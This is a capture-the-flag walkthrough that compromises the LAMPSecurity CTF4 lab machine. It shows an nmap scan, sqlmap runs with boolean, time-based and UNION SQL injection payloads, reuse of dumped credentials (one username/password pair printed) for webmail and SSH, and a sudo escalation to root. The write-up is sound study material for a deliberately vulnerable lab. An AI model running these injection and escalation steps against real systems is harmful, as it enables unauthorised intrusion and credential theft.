Today’s target is part of a CTF series by the LAMPSecurity project.
The Nmap scan reveals just a few ports:
12345678910111213
root@pwnbox:~/Downloads#nmap -sS -sV -p1-65535 192.168.80.152
Starting Nmap 6.49BETA5 ( https://nmap.org ) at 2016-03-02 09:26 EST
Nmap scan report for 192.168.80.152
Host is up, received arp-response (0.00038s latency).
Not shown: 65531 filtered ports, 1 closed port
Reason: 65369 no-responses, 162 host-prohibiteds and 1 reset
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 4.3 (protocol 2.0)
25/tcp open smtp syn-ack ttl 64 Sendmail 8.13.5/8.13.5
80/tcp open http syn-ack ttl 64 Apache httpd 2.2.0 ((Fedora))
MAC Address: 00:0C:29:1D:B6:45 (VMware)
Service Info: Host: ctf4.sas.upenn.edu; OS: Unix
Checking out the web server, we can see this page:
Let’s get digging!
Recon
The Blog section contains some blog posts, for which the URL looks like this: http://192.168.80.152/index.html?page=blog&title=Blog&id=5. That id parameter calls for SQLi testing and the page parameter could be vulnerable to LFI. But for now, let’s keep sniffing around.
One of the things I always do when doing web based challenges is check if there’s anything of interest in the robots.txt file. So I did it here as well and I wasn’t disappointed:
Quite a few places to check! Let’s see what we’ve got.
/mail/
This is not your regular mail server:
I’ve never seen this before, so I checked the project’s homepage:
SquirrelMail is a standards-based webmail package written in PHP. It includes built-in pure PHP support for the IMAP and SMTP protocols, and
all pages render in pure HTML 4.0 (with no JavaScript required) for maximum compatibility across browsers. It has very few requirements and is
very easy to configure and install. SquirrelMail has all the functionality you would want from an email client, including strong MIME support,
address books, and folder manipulation.
Ok, will come back to this, for now I’m just checking the entire thing for possible entry points.
/restricted/
Trying to get to this folder will pop up a basic authentication window. Moving on
/conf/
This one gives an internal server error, but discloses the e-mail address of the server administrator: dstevens@localhost
/sql/
Here we have a directory indexing with a db.sql file that contains the following:
Also, the search functionality is vulnerable to XSS! Ok, we have enough information to start poking deeper.
Getting in
First thing I tried was to put a quote in the id parameter, and a SQL error popped up: Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /var/www/html/pages/blog.php on line 20. Time to fire Sqlmap!
sqlmap -u "http://192.168.80.152/index.html?page=blog&title=Blog&id=2" -p "id" --dbms=MySQL --dbs
[06:05:45] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: page=blog&title=Blog&id=2 AND 4151=4151
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: page=blog&title=Blog&id=2 AND (SELECT * FROM (SELECT(SLEEP(5)))tueL)
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: page=blog&title=Blog&id=2 UNION ALL SELECT NULL,NULL,CONCAT(0x716a7a7671,0x61536d554d5745557253,0x7162716a71),NULL,NULL--
---
[06:05:45] [INFO] testing MySQL
[06:05:45] [INFO] confirming MySQL
[06:05:45] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Fedora 5 (Bordeaux)
web application technology: Apache 2.2.0, PHP 5.1.2
back-end DBMS: MySQL >= 5.0.0
[06:05:45] [INFO] fetching database names
available databases [6]:
[*] calendar
[*] ehks
[*] information_schema
[*] mysql
[*] roundcubemail
[*] test
I then looked at the ehks database, the interesting table contains usernames and password hashes:
With dstevens’ credentials I was able to log in both to the mail and admin panel. The admin functionality allows you to create another blog page, which I tested and it works. The mailbox was more interesting, because it was filled with OSSEC HIDS logs of my attacks! Will delete them before I’m done, but for now I scrolled all the way to the bottom to find some real mail:
1234567
I'm installing OSSEC v2 on the server - so I also had to install gcc and
binutils. Just wanted to let you know.
--
Andrew Chen
Unix Administrator
Ehks Data Research Center
I’m thinking this mail is not just for occupying storage, but it’s hinting that we’ll have to do some binary exploitation on the target..Anyway, there is more mail about the server setup:
12345678910
Hello all,
the server is up and running now and should be able to support most of
our needs. Don and I are still working on installing a few more patches
and configuring things. Let us know if you have any problems. Thanks!
--
Don Stevens
Sr. Unix Admin
Prof. Ehks Data Research Center
12345678910111213
Hey Don,
I think I got the server pretty much set up. I just have to make some
more adjustments. Unfortunately I couldn't get RoundCube installed
because our version of PHP is too low. I'll send more updates as I make
them.
--
James Durbin
Webmaster
Prof. Ehks Data Research Center
There is also mail about a calendar feature that I wasn’t aware of:
12345678910
Hello all,
I'd like to announce that the new calendaring software is online. You
all have accounts that you can log in with, they have the same username
and password as your machine accounts. Feel free to log into the new
system at http://192.168.0.6/calendar. Let me know if you have any
problems.
--
Don Stevens
I’ve almost forgotten to check the /restricted folder, so I next did that. It worked with the pair of pmoore/Homesite. Inside there are 2 text files:
12345678910111213141516171819
blog_instructions.txt
Instructions for Posting to the Blog
====================================
Just log into the admin section at http://192.168.0.6/admin.
Use your regular machine credentials (username and password).
Once you're logged in click the "Blog" link.
webmail_instructions.txt
Instructions for Webmail
========================
Browse to the URL http://192.168.0.6/mail
Log in with your regular machine credentials (username and password).
Use webmail ;)
Let Don or James know if you're having problems.
Just stuff we had figured on our own. I checked the PHP version, because of the mail hint, the headers mention it as being 5.1.2. Next I logged in for the calendar:
In the admin tab we can modify some calendar options and add a new user. Nothing too helpful in hacking the target, although I did try a RFI because a Nessus scan I’ve run indicated the calendar was vulnerable to arbitrary file inclusion. So the last thing left to try before thinking of more options was to see if I could login to SSH with any of the usernames and passwords I had. And I was able to get in the box from the first try, as dstevens!
I looked around in his home directory, the files related to the site are hosted there. Then I tried to read the /etc/sudoers file, and it worked with sudo and his password:
123456
...
# User privilege specification
root ALL=(ALL) ALL
dstevens ALL=(ALL) ALL
achen ALL=(ALL) NOPASSWD:ALL
...
Well, look at these privileges! Then it’s all the matter of becoming root with a simple su:
1234
[dstevens@ctf4 calendar]$ sudo su -
Password:
[root@ctf4 ~]# whoami
root
Game over! Although at the beginning there seemed to be multiple web avenues for exploitation, most of them were informational, and it was just the SQL injection that gave the keys to the kingdom. Lax permissions and password reuse facilitated the compromise of the target.
1234567891011121314
/ Q: How do you shoot a blue elephant? A: \
| With a blue-elephant gun. |
| |
| Q: How do you shoot a pink elephant? A: |
| Twist its trunk until it turns blue, |
| then shoot it with |
| |
\ a blue-elephant gun. /
-----------------------------------------
\ ^__^
\ (oo)\_______
(__)\ )\/\
||----w |
|| ||